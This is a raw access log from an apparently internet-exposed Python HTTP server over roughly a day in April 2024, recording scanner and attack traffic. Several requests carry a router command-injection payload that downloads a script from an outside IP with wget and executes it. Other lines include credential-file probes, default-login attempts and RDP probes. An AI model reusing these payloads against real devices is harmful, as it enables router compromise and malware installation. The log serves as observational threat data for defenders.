"/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.138.127 - - [23/Apr/2024 03:32:34] "GET / HTTP/1.1" 200 - 167.94.138.127 - - [23/Apr/2024 03:32:38] "GET / HTTP/1.1" 200 - 167.94.138.127 - - [23/Apr/2024 03:32:39] code 505, message Invalid HTTP version (2.0) 167.94.138.127 - - [23/Apr/2024 03:32:39] "PRI * HTTP/2.0" 505 - 167.94.138.127 - - [23/Apr/2024 03:32:39] code 404, message File not found 167.94.138.127 - - [23/Apr/2024 03:32:39] "GET /favicon.ico HTTP/1.1" 404 - 46.174.191.30 - - [23/Apr/2024 03:40:49] "GET / HTTP/1.0" 200 - 183.56.201.169 - - [23/Apr/2024 05:00:06] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [23/Apr/2024 05:13:42] "GET / HTTP/1.1" 200 - 34.140.108.54 - - [23/Apr/2024 05:30:06] "GET / HTTP/1.1" 200 - 89.190.156.175 - - [23/Apr/2024 05:33:38] code 404, message File not found 89.190.156.175 - - [23/Apr/2024 05:33:38] "GET /cgi-bin/luci HTTP/1.1" 404 - 89.190.156.175 - - [23/Apr/2024 05:33:38] code 404, message File not found 89.190.156.175 - - [23/Apr/2024 05:33:38] "GET /login HTTP/1.1" 404 - 89.190.156.175 - - [23/Apr/2024 05:33:39] code 404, message File not found 89.190.156.175 - - [23/Apr/2024 05:33:39] "GET /cgi-bin/luci/admin HTTP/1.1" 404 - 89.190.156.175 - - [23/Apr/2024 05:33:39] "GET / HTTP/1.1" 200 - 193.177.182.8 - - [23/Apr/2024 06:11:38] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [23/Apr/2024 06:15:03] code 404, message File not found 5.181.190.250 - - [23/Apr/2024 06:15:03] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 198.235.24.234 - - [23/Apr/2024 06:16:15] code 400, message Bad request version ('À\\x13À') 198.235.24.234 - - [23/Apr/2024 06:16:15] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03\\þ©5=4\x14ÇcÌÉj9\x9a­\x07bW\x06\x11Ǭ\x9eA\x01Mó­P`Q\x9b }ÝUP¨ÌÔ5)¯ÀM£p=>¶F\x10nwx¨=\x87$à"@ö\x83¹\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.234 - - [23/Apr/2024 06:16:16] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.234 - - [23/Apr/2024 06:16:16] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03ë\x0e1\x8eZ\x06sz§¢×g\x96ØúbVå\x1c\x06#\x9c+\x8f¡àE5õåéN\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 179.43.190.218 - - [23/Apr/2024 07:06:18] code 404, message File not found 179.43.190.218 - - [23/Apr/2024 07:06:18] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 194.165.16.10 - - [23/Apr/2024 07:09:47] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.165.16.10 - - [23/Apr/2024 07:09:47] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 211.23.217.173 - - [23/Apr/2024 07:18:21] "GET / HTTP/1.1" 200 - 143.244.165.19 - - [23/Apr/2024 07:20:10] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [23/Apr/2024 07:41:07] "GET / HTTP/1.1" 200 - 179.43.191.18 - - [23/Apr/2024 07:54:53] code 404, message File not found 179.43.191.18 - - [23/Apr/2024 07:54:53] "GET /cpanel HTTP/1.1" 404 - 205.210.31.10 - - [23/Apr/2024 08:17:07] "GET / HTTP/1.0" 200 - 221.122.67.75 - - [23/Apr/2024 08:21:33] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [23/Apr/2024 09:01:35] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [23/Apr/2024 10:09:01] "GET / HTTP/1.1" 200 - 41.84.228.194 - - [23/Apr/2024 10:09:45] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [23/Apr/2024 10:37:32] code 404, message File not found 5.181.190.250 - - [23/Apr/2024 10:37:32] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 184.105.139.70 - - [23/Apr/2024 10:41:16] code 400, message Bad request version ('À\\x14À') 184.105.139.70 - - [23/Apr/2024 10:41:16] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Kp\x10;4\x98D+Ù\\\x90{\x0cÃö)Ù3®^Y·Óý?Ë\x1a\x17í\x90z\x1c\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 185.224.128.43 - - [23/Apr/2024 10:42:04] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [23/Apr/2024 11:00:04] "GET / HTTP/1.1" 200 - 107.170.224.33 - - [23/Apr/2024 11:37:56] "GET / HTTP/1.1" 200 - 46.8.43.78 - - [23/Apr/2024 11:41:13] code 501, message Unsupported method ('POST') 46.8.43.78 - - [23/Apr/2024 11:41:13] "POST /boaform/admin/formLogin HTTP/1.1" 501 - 141.98.11.128 - - [23/Apr/2024 12:09:06] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.145.100', 48050) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.145.100 - - [23/Apr/2024 12:10:27] "GET / HTTP/1.1" 200 - 167.94.145.100 - - [23/Apr/2024 12:10:31] "GET / HTTP/1.1" 200 - 167.94.145.100 - - [23/Apr/2024 12:10:32] code 505, message Invalid HTTP version (2.0) 167.94.145.100 - - [23/Apr/2024 12:10:32] "PRI * HTTP/2.0" 505 - 167.94.145.100 - - [23/Apr/2024 12:10:32] code 404, message File not found 167.94.145.100 - - [23/Apr/2024 12:10:32] "GET /favicon.ico HTTP/1.1" 404 - 5.181.190.250 - - [23/Apr/2024 12:10:33] code 404, message File not found 5.181.190.250 - - [23/Apr/2024 12:10:33] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 179.43.190.218 - - [23/Apr/2024 12:38:26] code 404, message File not found 179.43.190.218 - - [23/Apr/2024 12:38:26] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 146.148.113.189 - - [23/Apr/2024 12:46:08] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [23/Apr/2024 13:03:54] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [23/Apr/2024 13:07:36] "GET / HTTP/1.1" 200 - 185.224.128.17 - - [23/Apr/2024 13:38:37] code 501, message Unsupported method ('CONNECT') 185.224.128.17 - - [23/Apr/2024 13:38:37] "CONNECT example.com:80 HTTP/1.1" 501 - 185.224.128.17 - - [23/Apr/2024 13:38:52] code 400, message Bad request syntax ('\\x04\\x01\\x00P\\x00\\x00\\x00\\x01\\x00example.com\\x00') 185.224.128.17 - - [23/Apr/2024 13:38:52] "\x04\x01\x00P\x00\x00\x00\x01\x00example.com\x00" 400 - 185.224.128.17 - - [23/Apr/2024 13:38:52] code 400, message Bad request syntax ('\\x05\\x01\\x00') 185.224.128.17 - - [23/Apr/2024 13:38:52] "\x05\x01\x00" 400 - 141.98.11.128 - - [23/Apr/2024 13:46:13] "GET / HTTP/1.1" 200 - 146.190.174.114 - - [23/Apr/2024 13:59:23] code 404, message File not found 146.190.174.114 - - [23/Apr/2024 13:59:23] "GET /.well-known/probing.txt HTTP/1.1" 404 - 87.121.69.52 - - [23/Apr/2024 14:25:12] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [23/Apr/2024 14:25:12] "CONNECT google.com:443 HTTP/1.1" 501 - 115.58.83.79 - - [23/Apr/2024 14:40:42] code 404, message File not found 115.58.83.79 - - [23/Apr/2024 14:40:42] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 - 194.169.175.40 - - [23/Apr/2024 14:41:21] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.169.175.40 - - [23/Apr/2024 14:41:21] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 141.98.11.128 - - [23/Apr/2024 14:43:07] "GET / HTTP/1.1" 200 - 104.152.52.179 - - [23/Apr/2024 14:53:24] "GET / HTTP/1.0" 200 - 142.93.35.106 - - [23/Apr/2024 15:30:03] code 400, message Bad request version (';') 142.93.35.106 - - [23/Apr/2024 15:30:03] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03O8\x9fuÐI§J\x0c\x0cL^)\x03ç\x1bS¢´µß\x0c;" 400 - 66.240.205.34 - - [23/Apr/2024 16:05:08] code 400, message Bad request version ('ô') 66.240.205.34 - - [23/Apr/2024 16:05:08] "H\x00\x00\x00tj¨\x9e#D\x98+Êð§»lÅ\x19×\x8d¶\x18íJ\x1enÁùxu[lðE\x1d-jìÔxLÉrÉ\x15\x10uà%\x86Rtg\x05fv\x86]%Ì\x80\x0cèÏ®\x00µÀfÈ\x8dDÅ\x09ô" 400 - 185.189.182.234 - - [23/Apr/2024 16:14:46] "GET / HTTP/1.1" 200 - 185.161.248.199 - - [23/Apr/2024 16:21:42] "GET / HTTP/1.1" 200 - 198.199.94.19 - - [23/Apr/2024 16:28:52] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 198.199.94.19 - - [23/Apr/2024 16:28:52] "MGLNDD_203.219.129.101_80" 400 - ---------------------------------------- Exception occurred during processing of request from ('162.142.125.12', 55656) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 162.142.125.12 - - [23/Apr/2024 17:31:38] "GET / HTTP/1.1" 200 - 162.142.125.12 - - [23/Apr/2024 17:31:41] "GET / HTTP/1.1" 200 - 162.142.125.12 - - [23/Apr/2024 17:31:42] code 505, message Invalid HTTP version (2.0) 162.142.125.12 - - [23/Apr/2024 17:31:42] "PRI * HTTP/2.0" 505 - 162.142.125.12 - - [23/Apr/2024 17:31:42] code 404, message File not found 162.142.125.12 - - [23/Apr/2024 17:31:42] "GET /favicon.ico HTTP/1.1" 404 - 141.98.11.128 - - [23/Apr/2024 17:34:49] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [23/Apr/2024 17:54:27] code 404, message File not found 5.181.190.250 - - [23/Apr/2024 17:54:27] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.224.128.43 - - [23/Apr/2024 18:33:43] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [23/Apr/2024 18:36:23] code 404, message File not found 179.43.190.218 - - [23/Apr/2024 18:36:23] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 103.203.56.1 - - [23/Apr/2024 18:39:44] "GET / HTTP/1.1" 200 - 157.245.105.107 - - [23/Apr/2024 18:55:47] code 400, message Bad request version ('À\\x13À') 157.245.105.107 - - [23/Apr/2024 18:55:47] "\x16\x03\x01\x00ê\x01\x00\x00æ\x03\x03\x111íØv"G,ø£Zðº\x84eI\x8eé²ô¨k\x9b\x97ÖQ§\x19\x17¼\x19ä ËDal\x1dC¾&3rØ\x92\x04æka¯Ð\x0e\x88\x17\x7fkUÊ>Nµ~ØñÏ\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 157.245.105.107 - - [23/Apr/2024 18:55:48] "GET / HTTP/1.1" 200 - 157.245.105.107 - - [23/Apr/2024 18:55:48] "GET / HTTP/1.1" 200 - 157.245.105.107 - - [23/Apr/2024 18:55:49] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:49] "GET /server HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:50] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:50] "GET /.vscode/sftp.json HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:50] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:50] "GET /about HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:51] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:51] "GET /debug/default/view?panel=config HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:51] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:51] "GET /v2/_catalog HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:52] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:52] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:53] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:53] "GET /server-status HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:53] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:53] "GET /login.action HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:54] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:54] "GET /_all_dbs HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:54] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:54] "GET /.DS_Store HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:55] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:55] "GET /.env HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:56] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:56] "GET /.git/config HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:56] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:56] "GET /s/130313e2932313e2931323e2330323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:57] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:57] "GET /config.json HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:57] code 404, message File not found 157.245.105.107 - - [23/Apr/2024 18:55:57] "GET /telescope/requests HTTP/1.1" 404 - 157.245.105.107 - - [23/Apr/2024 18:55:58] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 - 146.19.24.28 - - [23/Apr/2024 19:41:29] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [23/Apr/2024 20:02:32] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [23/Apr/2024 20:02:32] "CONNECT google.com:443 HTTP/1.1" 501 - 179.43.180.108 - - [23/Apr/2024 20:13:06] code 501, message Unsupported method ('CONNECT') 179.43.180.108 - - [23/Apr/2024 20:13:06] "CONNECT ifconfig.me:443 HTTP/1.1" 501 - 46.174.191.32 - - [23/Apr/2024 20:15:24] "GET / HTTP/1.0" 200 - 162.216.150.210 - - [23/Apr/2024 20:52:37] "GET / HTTP/1.1" 200 - 66.240.205.34 - - [23/Apr/2024 21:11:21] code 400, message Bad request version ("x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==") 66.240.205.34 - - [23/Apr/2024 21:11:21] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 - 184.105.139.69 - - [23/Apr/2024 21:14:27] "GET / HTTP/1.1" 200 - 184.105.139.69 - - [23/Apr/2024 21:17:13] code 404, message File not found 184.105.139.69 - - [23/Apr/2024 21:17:13] "GET /favicon.ico HTTP/1.1" 404 - 184.105.139.69 - - [23/Apr/2024 21:18:07] code 404, message File not found 184.105.139.69 - - [23/Apr/2024 21:18:07] "GET /geoserver/web/ HTTP/1.1" 404 - 128.199.137.235 - - [23/Apr/2024 21:25:05] code 501, message Unsupported method ('POST') 128.199.137.235 - - [23/Apr/2024 21:25:05] "POST /wp-login.php HTTP/1.1" 501 - 128.199.137.235 - - [23/Apr/2024 21:25:05] code 501, message Unsupported method ('POST') 128.199.137.235 - - [23/Apr/2024 21:25:05] "POST /wordpress/wp-login.php HTTP/1.1" 501 - 83.97.73.245 - - [23/Apr/2024 21:37:29] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 114.143.158.122 - - [23/Apr/2024 21:50:07] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [23/Apr/2024 22:36:42] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [23/Apr/2024 23:08:15] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [23/Apr/2024 23:17:18] code 404, message File not found 83.97.73.245 - - [23/Apr/2024 23:17:18] "GET /actuator/gateway/routes HTTP/1.1" 404 - 85.90.246.159 - - [23/Apr/2024 23:47:08] code 400, message Bad request version ('À\\x14À') 85.90.246.159 - - [23/Apr/2024 23:47:08] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03%\x19aÄÇÝ\x16\x85µX\x95ãÈU\x92ÿÀ\x85t\x13Q\x04Í°6\x82\x98|EW¢Ì\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 141.98.11.128 - - [23/Apr/2024 23:50:12] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [23/Apr/2024 23:50:58] code 404, message File not found 179.43.190.218 - - [23/Apr/2024 23:50:58] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 91.191.209.202 - - [24/Apr/2024 00:12:48] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 91.191.209.202 - - [24/Apr/2024 00:12:48] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 46.8.43.78 - - [24/Apr/2024 00:24:46] code 501, message Unsupported method ('POST') 46.8.43.78 - - [24/Apr/2024 00:24:46] "POST /boaform/admin/formLogin HTTP/1.1" 501 - 141.98.11.128 - - [24/Apr/2024 00:27:52] "GET / HTTP/1.1" 200 - 185.180.143.79 - - [24/Apr/2024 00:49:32] "GET / HTTP/1.1" 200 - 185.180.143.79 - - [24/Apr/2024 00:49:36] code 404, message File not found 185.180.143.79 - - [24/Apr/2024 00:49:36] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 - 45.155.91.99 - - [24/Apr/2024 00:56:35] code 400, message Bad request version ('À\\x13À') 45.155.91.99 - - [24/Apr/2024 00:56:35] "\x16\x03\x01\x00ä\x01\x00\x00à\x03\x03µ\x94ΰ\x80°\x80Ý?C¤Ês\x87\x09\x8dßå/EOO¬x%\x19Ù±'¸\x1d\x98 ¼\x09ö\x92;\x8bþ£`ê\x09\x97GÄñ¦\x9aM#Óë÷j\x86\x0f\x9c/x\x98\x0b\x1aÀ\x00\x1cÀ+À/À,À0̨̩À\x09À\x13À" 400 - 45.155.91.99 - - [24/Apr/2024 00:56:36] code 404, message File not found 45.155.91.99 - - [24/Apr/2024 00:56:36] "GET /db_backup/ HTTP/1.1" 404 - 80.94.92.60 - - [24/Apr/2024 01:01:58] "GET / HTTP/1.1" 200 - 185.180.140.5 - - [24/Apr/2024 01:03:13] code 404, message File not found 185.180.140.5 - - [24/Apr/2024 01:03:13] "GET /favicon-32x32.png HTTP/1.1" 404 - 179.43.190.218 - - [24/Apr/2024 01:07:17] code 404, message File not found 179.43.190.218 - - [24/Apr/2024 01:07:17] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Fbin%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 141.98.11.128 - - [24/Apr/2024 01:39:09] "GET / HTTP/1.1" 200 - 185.161.248.148 - - [24/Apr/2024 01:40:42] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.161.248.148 - - [24/Apr/2024 01:40:42] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 194.50.16.190 - - [24/Apr/2024 01:49:04] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [24/Apr/2024 02:02:23] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [24/Apr/2024 02:02:23] "CONNECT google.com:443 HTTP/1.1" 501 - 91.191.209.202 - - [24/Apr/2024 02:03:58] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 91.191.209.202 - - [24/Apr/2024 02:03:58] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 87.236.176.194 - - [24/Apr/2024 02:04:26] "GET / HTTP/1.1" 200 - 3.239.82.142 - - [24/Apr/2024 02:10:45] code 404, message File not found 3.239.82.142 - - [24/Apr/2024 02:10:45] "GET /manager/html HTTP/1.1" 404 - 46.8.43.78 - - [24/Apr/2024 02:17:40] code 501, message Unsupported method ('POST') 46.8.43.78 - - [24/Apr/2024 02:17:40] "POST /boaform/admin/formLogin HTTP/1.1" 501 - 141.98.11.128 - - [24/Apr/2024 02:25:43] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [24/Apr/2024 02:52:26] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [24/Apr/2024 02:55:59] code 404, message File not found 5.181.190.250 - - [24/Apr/2024 02:55:59] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 146.19.24.28 - - [24/Apr/2024 02:57:03] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [24/Apr/2024 04:00:16] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [24/Apr/2024 04:56:51] "GET / HTTP/1.1" 200 - 45.156.128.45 - - [24/Apr/2024 05:02:10] "GET / HTTP/1.1" 200 - 185.170.144.3 - - [24/Apr/2024 05:12:33] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.170.144.3 - - [24/Apr/2024 05:12:33] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 141.98.11.128 - - [24/Apr/2024 05:18:05] "GET / HTTP/1.1" 200 - 1.24.16.96 - - [24/Apr/2024 05:39:06] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00î\\x01\\x00\\x00ê\\x03\\x03A}\\x9aOÎ\\x0eØ+mÅì)L£!') 1.24.16.96 - - [24/Apr/2024 05:39:06] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03A}\x9aOÎ\x0eØ+mÅì)L£!" 400 - 175.30.48.97 - - [24/Apr/2024 05:39:11] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00î\\x01\\x00\\x00ê\\x03\\x03\\t') 175.30.48.97 - - [24/Apr/2024 05:39:11] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03\x09" 400 - 61.52.78.125 - - [24/Apr/2024 05:39:20] "GET / HTTP/1.1" 200 - 110.177.179.34 - - [24/Apr/2024 05:39:22] code 400, message Bad HTTP/0.9 request type ('USER') 110.177.179.34 - - [24/Apr/2024 05:39:22] "USER anonymous" 400 - 162.243.149.12 - - [24/Apr/2024 05:39:40] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 162.243.149.12 - - [24/Apr/2024 05:39:40] "MGLNDD_203.219.129.101_80" 400 - 198.235.24.235 - - [24/Apr/2024 05:48:47] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [24/Apr/2024 05:56:06] "GET / HTTP/1.1" 200 - 80.75.212.75 - - [24/Apr/2024 05:56:57] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [24/Apr/2024 05:56:57] "CONNECT www.google.com:443 HTTP/1.1" 501 - 141.98.11.128 - - [24/Apr/2024 06:07:30] "GET / HTTP/1.1" 200 - 45.156.129.48 - - [24/Apr/2024 06:27:25] "GET / HTTP/1.1" 200 - 45.156.129.48 - - [24/Apr/2024 06:27:26] code 404, message File not found 45.156.129.48 - - [24/Apr/2024 06:27:26] "GET /wp-content/plugins/kingcomposer/readme.txt HTTP/1.1" 404 - 179.43.190.218 - - [24/Apr/2024 07:05:57] code 404, message File not found 179.43.190.218 - - [24/Apr/2024 07:05:57] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Fbin%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.191.126.213 - - [24/Apr/2024 07:45:51] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [24/Apr/2024 08:04:20] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [24/Apr/2024 08:43:19] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [24/Apr/2024 08:43:19] "CONNECT google.com:443 HTTP/1.1" 501 - 185.224.128.43 - - [24/Apr/2024 09:02:22] "GET / HTTP/1.1" 200 - 162.216.150.46 - - [24/Apr/2024 09:06:05] "GET / HTTP/1.1" 200 - 